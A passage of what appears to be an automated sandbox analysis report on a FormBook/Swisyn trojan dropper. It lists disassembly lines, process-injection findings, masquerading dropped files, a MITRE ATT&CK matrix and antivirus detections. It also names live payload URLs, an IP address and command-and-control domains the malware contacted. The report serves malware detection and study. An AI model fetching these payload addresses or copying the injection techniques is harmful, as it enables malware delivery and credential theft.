Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3C0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3C0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3DA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3DF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3DF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3DF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E478CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E43B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E426CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E426CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E426CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E4614FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E423884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E423884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E423540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3AAD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3C4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3C4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3C4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3C4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3C4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3AB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3AB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3CC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3CC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3AC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3C7D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E478D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E42A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3CB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3CB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E426DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3DFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3DFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E4341E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E458DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3DA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3CC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E4269A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E4705AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E4705AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E4251BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E4251BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E4251BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E4251BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_0056906B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_00564415 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_00564413 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_005690F7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_00566C83 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_005690B7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_005690AB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_00569137 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_00567EE5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_00567F4B mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\os9tzxfmtz.exe

Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System\explorer.exe	Domain query: vccmd01.googlecode.com
Source: C:\Windows\System\explorer.exe	Domain query: vccmd02.googlecode.com
Source: C:\Windows\System\explorer.exe	Network Connect: 74.125.143.82 80
Source: C:\Windows\System\explorer.exe	Domain query: vccmd01.zxq.net
Source: C:\Windows\System\explorer.exe	Domain query: vccmd03.googlecode.com
Source: C:\Windows\System\explorer.exe	Domain query: vccmd01.t35.com

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Section loaded: unknown target: C:\Windows\System\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\os9tzxfmtz.exe

Thread register set: target process: 3472

Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process created: C:\Users\user\Desktop\os9tzxfmtz.exe c:\users\user\desktop\os9tzxfmtz.exe
Source: C:\Windows\System\explorer.exe	Process created: unknown unknown

Source: os9tzxfmtz.exe , 0000001D.00000002.353878128.000000001E6B0000.00000040.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: os9tzxfmtz.exe , 0000001D.00000002.353878128.000000001E6B0000.00000040.00000001.sdmp	Binary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
Source: explorer.exe, 00000004.00000002.367234221.0000000000783000.00000004.00000020.sdmp	Binary or memory string: Program ManagerW64\at.exexe

Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe

Code function: 0_2_0041E9D0 __vbaChkstk,__vbaOnError,#525,__vbaStrMove,__vbaLenBstr,__vbaStrToAnsi,GetUserNameA,__vbaStrToUnicode,__vbaFreeStr,#537,__vbaStrMove,__vbaInStr,#616,__vbaStrMove,__vbaFreeStr,__vbaFreeStr,__vbaErrorOverflow,

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job1	DLL Side-Loading1	DLL Side-Loading1	Deobfuscate/Decode Files or Information1	Credential API Hooking1	Account Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer4	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Windows Service1	Windows Service1	Obfuscated Files or Information3	Input Capture121	File and Directory Discovery1	Remote Desktop Protocol	Credential API Hooking1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Scheduled Task/Job1	Process Injection312	Software Packing1	Security Account Manager	System Information Discovery221	SMB/Windows Admin Shares	Input Capture121	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Registry Run Keys / Startup Folder1	Scheduled Task/Job1	DLL Side-Loading1	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol114	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder1	File Deletion1	LSA Secrets	Security Software Discovery641	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Rootkit1	Cached Domain Credentials	Virtualization/Sandbox Evasion24	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading231	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion24	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection312	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
os9TZxfmTZ.exe	83%	Virustotal		Browse
os9TZxfmTZ.exe	96%	ReversingLabs	Win32.Trojan.Swisyn
os9TZxfmTZ.exe	100%	Avira	TR/Dropper.Gen
os9TZxfmTZ.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\icsys.icn.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Roaming\mrsys.exe	100%	Avira	TR/Dropper.Gen
C:\Windows\System\svchost.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\stsys.exe	100%	Avira	TR/Dropper.Gen
C:\Windows\System\spoolsv.exe	100%	Avira	TR/Dropper.Gen
C:\Windows\System\explorer.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\icsys.icn.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\mrsys.exe	100%	Joe Sandbox ML
C:\Windows\System\svchost.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\stsys.exe	100%	Joe Sandbox ML
C:\Windows\System\spoolsv.exe	100%	Joe Sandbox ML
C:\Windows\System\explorer.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\os9tzxfmtz.exe	4%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
29.2.os9tzxfmtz.exe .1e6b0000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.icsys.icn.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
8.2.spoolsv.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
5.2.spoolsv.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
38.2.explorer.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
8.0.spoolsv.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
0.2.os9TZxfmTZ.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
2.0.icsys.icn.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
4.0.explorer.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
6.0.svchost.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
4.2.explorer.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
5.0.spoolsv.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
38.0.explorer.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
0.0.os9TZxfmTZ.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File

Domains

Source	Detection	Scanner	Link
www.postphenomenon.com	0%	Virustotal	Browse
demo.sdssoftltd.co.uk	2%	Virustotal	Browse
vccmd03.googlecode.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://vccmd03.googlecode.com/files/cmsys.gif	0%	Avira URL Cloud	safe
http://vccmd01.t35.com/e.com/files/cmsys.gif	0%	Avira URL Cloud	safe
https://demo.sdssoftltd.co.uk/bin_iOxAb78.binhttp://103.141.138.118/bin_iOxAb78.bin	0%	Avira URL Cloud	safe
http://vccmd03.googlecode.com/	0%	Avira URL Cloud	safe
http://vccmd01.zxq.net/cmsys.gifllxw	0%	Avira URL Cloud	safe
http://vccmd02.googlecode.com/files/cmsys.gifi%I	0%	Avira URL Cloud	safe
http://vccmd01.zxq.net/cmsys.gifVw	0%	Avira URL Cloud	safe
https://demo.sdssoftltd.co.uk/bin_iOxAb78.bin	0%	Avira URL Cloud	safe
http://vccmd02.googlecode.com/files/cmsys.gif	0%	Avira URL Cloud	safe
http://103.141.138.118/bin_iOxAb78.bin	0%	Avira URL Cloud	safe
http://vccmd01.googlecode.com/files/cmsys.gift	0%	Avira URL Cloud	safe
http://vccmd01.t35.com/cmsys.gif	0%	Avira URL Cloud	safe
http://vccmd01.zxq.net/cmsys.gifr	0%	Avira URL Cloud	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
http://vccmd01.t35.com/cmsys.gifnw	0%	Avira URL Cloud	safe
http://vccmd01.zxq.net/cmsys.gift	0%	Avira URL Cloud	safe
http://vccmd01.zxq.net/	0%	Avira URL Cloud	safe
http://vccmd02.googlecode.com/	0%	Avira URL Cloud	safe
http://vccmd01.t35.com/cmsys.gifusercontent.comn	0%	Avira URL Cloud	safe
http://vccmd01.zxq.net/01.zxq.net/cmsys.gifusercontent.comu	0%	Avira URL Cloud	safe
http://vccmd01.googlecode.com/files/cmsys.gifA	0%	Avira URL Cloud	safe
http://vccmd01.googlecode.com/files/cmsys.gif	0%	Avira URL Cloud	safe
http://vccmd01.t35.com/cmsys.gifr	0%	Avira URL Cloud	safe
http://vccmd03.googlecode.com/files/cmsys.gifP%n	0%	Avira URL Cloud	safe
http://vccmd01.zxq.net/e.com/files/cmsys.gif	0%	Avira URL Cloud	safe
www.evolvekitchendesign.com/ffw/	0%	Avira URL Cloud	safe
http://vccmd01.zxq.net/cmsys.gifH	0%	Avira URL Cloud	safe
http://vccmd03.googlecode.com/files/cmsys.gifC%c	0%	Avira URL Cloud	safe
http://vccmd01.zxq.net/cmsys.gif	0%	Avira URL Cloud	safe
http://vccmd01.googlecode.com/	0%	Avira URL Cloud	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.postphenomenon.com	35.186.238.101	true	false	0%, Virustotal, Browse	unknown
